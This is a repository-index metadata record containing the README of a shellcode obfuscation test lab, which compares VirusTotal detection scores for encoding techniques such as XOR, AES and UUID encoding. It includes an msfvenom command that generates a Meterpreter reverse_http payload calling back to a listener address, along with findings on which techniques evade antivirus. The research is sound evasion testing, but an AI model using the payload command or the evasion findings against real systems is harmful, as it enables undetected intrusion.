{"id":28725058,"url":"https://github.com/dobin/shellcodeobfuscationlab","last_synced_at":"2025-06-15T11:09:50.801Z","repository":{"id":294413165,"uuid":"986892303","full_name":"dobin/ShellcodeObfuscationLab","owner":"dobin","description":"Test bench lab for Shellcode Obfuscation","archived":false,"fork":false,"pushed_at":"2025-05-20T09:24:10.000Z","size":323,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-05-20T10:37:35.679Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/dobin.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-20T09:18:20.000Z","updated_at":"2025-05-20T09:24:13.000Z","dependencies_parsed_at":"2025-05-20T21:33:13.330Z","dependency_job_id":null,"html_url":"https://github.com/dobin/ShellcodeObfuscationLab","commit_stats":null,"previous_names":["dobin/shellcodeobfuscationlab"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/dobin/ShellcodeObfuscationLab","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dobin%2FShellcodeObfuscationLab","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dobin%2FShellcodeObfuscationLab/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dobin%2FShellcodeObfuscationLab/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dobin%2FShellcodeObfuscationLab/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/dobin","download_url":"https://codeload.github.com/dobin/ShellcodeObfuscationLab/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dobin%2FShellcodeObfuscationLab/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":259964324,"owners_count":22938726,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-06-15T11:09:49.979Z","updated_at":"2025-06-15T11:09:50.793Z","avatar_url":"https://github.com/dobin.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# SOL ShellcodeObfuscationLab\n\nShellcode obfuscations laboratory based on RedSiege [Chromatophore](https://github.com/RedSiege/Chromatophore/). \n\n\n## Background\n\nI see RedTeam research like [Adventures in Shellcode Obfuscation!](https://redsiege.com/blog/2024/09/adventures-in-shellcode-obfuscation-part-14-further-research/), a \n[14 part series](https://redsiege.com/adventures-in-shellcode-obfuscation/)\nof hiding shellcode using various different encryption- or encoding ciphers. \n\nIn the security scene, the myth perpetuates: How you encode a shellcode has an\ninfluence on the detection rate. The assumption is, that somehow an AV or security software\nhas a unique ability to automagically reverse engineer encryption ciphers, and also\nhave a quantum computer integrated to crack the key. \n\nThe truth is: AV doesnt know shit. \n\nRedSiege came to the following wrong result:\n\n| Technique          | VT Score |\n| ------------------ | -------- |\n| XOR Multibyte Key  | 2        |\n| Offsets            | 2        |\n| Jargon             | 3        |\n| Reverse Byte Order | 4        |\n| Jigsaw             | 4        |\n| Reversed Byte XOR  | 5        |\n| IPv4               | 6        |\n| MAC Address        | 6        |\n| Caesar             | 7        |\n| RC4                | 7        |\n| XOR                | 8        |\n| AES                | 8        |\n| Two Array          | 8        |\n| Reverse String     | 13       |\n| UUID               | 13       |\n| Base64             | 18       |\n| No Obfuscation     | 27       |\n\n\nBut didnt attempt to question the data. There are some issues with it: \n\n* Why are the top three Base64, UUID, and reverse hex string? Especially the later is very obscure\n* No negative test (without malicious shellcode)\n* Some programs are written in C, some in C#\n* Some use WinAPI (AES, RC4, UUID) which are either an IOC, or may block AV emulator\n* ReverseXor brute forces the key\n* In jargon.c they mention that Defender detects the decryption routine itself. Same in xor_multibyte\n* As they store the shellcode in a variable, static analysis tools can try out their deobfuscation on all the variables (explains high detection of ReverseString and Base64)\n* Scans performed with large intervals between them (weeks?)\n\nWhich means that the test has been performed wrong, and the results are invalid, \nand conclusions based on the data are misleading. \n\nLuckily RedSiege published the [shellcode encoder sources](https://github.com/RedSiege/Chromatophore).\nI made this framework based on it to test it for myself. \n\n\n## Predictions\n\n* Which encryption you use doesnt matter - they all equally resistant to analysis\n* Using windows API's will increase detection rate\n\n\n## Results\n\nTests have been performed with either \"random\" - a alphanumeric 20 byte string as \"shellcode\". And \"metasploit\" \nwith output of `msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.190.134 LPORT=80 -f raw -o beacon.bin`. \nThe \"metasploit\" does not execute the shellcode, only decodes and prints it. \n\nConclusion: \n* The type of encoding/encryption doesnt matter\n* More important is if a windows API is being used/imported (static analysis, e.g. IAT in PE)\n* Note that the \"NO-obfuscation\" (plaintext) metasploit outperforms AES encryption, base64 windows api, ip-, mac- and uuid-encoding\n* VirusTotal has maybe one memory scanner. The rest seem to be static analysis. \n\n| **What**           | **Library**           | **Includes**              | **Function / IAT**                 | **Random** | **Metasploit** |\n| ------------------ | --------------------- | ------------------------- | ---------------------------------- | ---------- | -------------- |\n| [aes](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/aes_work.c)                | crypt32.lib, advapi32 | wincrypt.h                | Crypt\\*                            | **5**          | **6**              |\n| [base64](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/base64_work.c)             | \\-                    | \\-                        | \\-                                 | 3          | 3              |\n| [base64api](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/base64api_work.c)          | crypt32.lib           | wincrypt.h                | CryptStringToBinaryA               | **5**          | **6**              |\n| [bin2ip](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/bin2ip_work.c)             | Ntdll.lib             | ntstatus.h\u003cbr\u003eIp2string.h | RtlIpv4StringToAddressA            | **8**          | **10**             |\n| [bin2mac](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/bin2mac_work.c)            | Ntdll.lib             | ntstatus.h\u003cbr\u003eIp2string.h | RtlEthernetStringToAddressA        | **8**          | **18**             |\n| [caesar](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/caesar_work.c)              | \\-                    | \\-                        | \\-                                 | 2          | 2              |\n| [jargon](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/jargon_work.c)             | \\-                    | \\-                        | \\-                                 | 3          | 2              |\n| [jigsaw](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/jigsaw_work.c)             | \\-                    | \\-                        | \\-                                 | 2          | 3              |\n| [offset](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/offset_work.c)             | \\-                    | \\-                        | \\-                                 | 2          | 3              |\n| [rc4api](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/rc4api_work.c)             | \\-                    | \\-                        | GetProcAddress (SystemFunction033) | 2          | 2              |\n| [reverse_byte_order](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/reverse_byte_order_work.c) | \\-                    | \\-                        | \\-                                 | 2          | 2              |\n| [reverse_hex_string](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/reverse_hex_string_work.c) | \\-                    | \\-                        | \\-                                 | 2          | 2              |\n| [twoarray](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/twoarray_work.c)           | \\-                    | \\-                        | \\-                                 | 2          | 3              |\n| [uuidapi](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/uuidapi_work.c)            | rpcrt4.lib            | rpc.h                     | UuidFromStringA                    | **8**          | **11**             |\n| [xor_multibyte](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/xor_multibyte_work.c)      | \\-                    | \\-                        | \\-                                 | 1          | 2              |\n| [xor_reverse](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/xor_reverse_work.c)        | \\-                    | \\-                        | \\-                                 | 2          | 3              |\n| [xor_single](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/xor_single_work.c)         | \\-                    | \\-                        | \\-                                 | 1          | 3              |\n| [**NO OBFUSCATION**](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/noobfuscation_work.c)     | \\-                    | \\-                        | \\-                                 | 2          | 3              |\n\n\nThe results of the test are at [lab_results/](https://github.com/dobin/ShellcodeObfuscationLab/tree/main/lab_results). \nFor example the generated [aes.c source code](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/aes_work.c),\nand its [VirusTotal result](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/aes.exe.json).\n\n\n## SOL Usage\n\nUse the `x64 native tools command prompt` from Visual Studio so you have access to `ml.exe` and `Windows.h`. \n\nTo compile all the source from `chromatophore/` into `output/*.exe`:\n```\n\u003e python.exe sol.py compile\n```\n\nTo send all the exes to VirusTotal:\n\n```\n\u003e set VT_API_KEY=123...\n\u003e python.exe sol.py vt\n```\n\nOutput is in `output/*.exe.json` and `output/scan_results.txt`. \n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdobin%2Fshellcodeobfuscationlab","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdobin%2Fshellcodeobfuscationlab","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdobin%2Fshellcodeobfuscationlab/lists"}